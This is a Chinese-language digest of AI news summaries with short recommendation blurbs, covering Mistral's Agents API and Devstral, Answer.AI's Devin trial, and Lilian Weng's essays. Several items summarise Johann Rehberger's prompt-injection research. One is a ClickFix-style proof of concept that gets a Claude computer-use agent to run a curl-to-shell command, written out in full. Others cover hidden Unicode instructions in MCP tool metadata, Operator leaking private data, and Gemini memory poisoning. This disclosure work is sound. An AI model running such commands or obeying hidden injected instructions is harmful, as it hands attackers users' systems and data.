Mistral 发布 Agents API,内置连接器与智能体编排
Mistral AI 发布新的 Agents API,将语言模型与代码执行、网页搜索、图像生成、文档库和 MCP 工具等内置连接器结合,并支持跨对话的持久记忆与多智能体编排。
推荐理由:官方原文给出内置连接器、有状态对话和智能体编排的具体能力,还附 SimpleQA 对比数字,便于评估它在实际工作流中的用法。
Mistral AI 发布新的 Agents API,将语言模型与代码执行、网页搜索、图像生成、文档库和 MCP 工具等内置连接器结合,并支持跨对话的持久记忆与多智能体编排。
推荐理由:官方原文给出内置连接器、有状态对话和智能体编排的具体能力,还附 SimpleQA 对比数字,便于评估它在实际工作流中的用法。
Johann Rehberger 发布 AI ClickFix 攻击概念验证,将现实中的 ClickFix 社会工程 TTP 改造后针对 Computer-Use Agent,诱导 claude-3-7-sonnet-20250219 在终端执行 curl -s https://wuzzi.net/computer/oops.html | sh。
Mistral AI 与 All Hands AI 合作发布软件工程智能体模型 Devstral,以 Apache 2.0 许可开源。
推荐理由:Mistral 自家发布,给出 SWE-Bench Verified 具体分数、开源许可和部署门槛,读者可据此评估其在本地或企业编码场景的可用性。
安全研究员 Johann Rehberger 发文解析 MCP 的安全风险并展示一条新的漏洞利用链。文章指出仅将恶意工具服务器加入会话即可劫持对话,工具元数据中的隐藏 Unicode Tag 指令可穿透 API 和 UI 层,用户在界面检查时不可见,Claude 会执行这些隐藏指令。
安全研究者 Johann Rehberger 在 ASCII Smuggler 中新增 Sneaky Bits 编码,用两个隐形 Unicode 字符(U+2062 表示 0、U+2064 表示 1)按位编码任意 Unicode 字符或字节序列。
Mistral AI 展示 TranscriptToPRDTicket 智能体工作流,由 Mistral Large 2 驱动的 PRDAgent 和 TicketCreationAgent 组成,可将会议转录自动生成 PRD 并拆解为开发任务,最终在 Linear、Jira 等项目管理工具中自动创建工单。
安全研究者 Johann Rehberger 实测演示 ChatGPT Operator 可被网页中的提示词注入劫持,将 news.ycombinator.com、booking.com 等已登录站点上的私密邮箱、地址和电话输入第三方数据泄露页面。
安全研究人员 Johann Rehberger 演示,通过在文档中嵌入提示注入并配合延迟工具调用,可诱导 Gemini Advanced 把虚假信息写入用户长期记忆。
Sam Altman 提出关于 AI 经济学的三点观察:AI 模型智能约等于训练与运行资源投入的对数,可预测的 scaling laws 在多个数量级上成立;使用特定智能水平的成本约每 12 个月下降 10 倍,GPT-4 到 GPT-4o 的每 token 价格下降约 150 倍;线性增长的智能带来的社会经济价值呈超指数级。
Answer.AI 团队对 Devin 进行一个月真实任务实测,20 个任务中 14 个失败、3 个无结论、仅 3 个成功,且无法预测哪些任务会成功。Devin 在处理现有代码库、研究类任务中常陷入技术死胡同或幻觉出不存在的功能,团队结论是其自主性反而成为负担,更倾向使用 Cursor 等由开发者主导的 AI 辅助工作流。
推荐理由:作者团队用一个月、20 个真实任务实测 Devin,给出了成败分布和与 Cursor 类工作流的对比,可作为评估自主编码智能体的参照。
Answer.AI 发布 ShellSage,一款运行在终端里的 AI 系统管理助手,可通过 pip install shell_sage 安装,需配置 ANTHROPIC_API_KEY。
Lilian Weng 在博客发布长文,系统阐述以 LLM 为核心控制器的自主智能体架构,将其拆解为规划、记忆、工具使用三大组件。
推荐理由:文章把 LLM 智能体系统拆解为规划、记忆、工具使用三大组件,梳理了 ReAct、Reflexion 等代表方法与共同局限,便于建立整体认知框架。
Lilian Weng 在 Lil'Log 发表 Prompt Engineering 长文,系统介绍不更新模型权重、靠提示引导大语言模型行为的方法。
推荐理由:Lilian Weng 系统梳理了从 few-shot 到 CoT、自洽采样和 Toolformer 的提示词方法,附带示例选择与偏差校准的可迁移经验。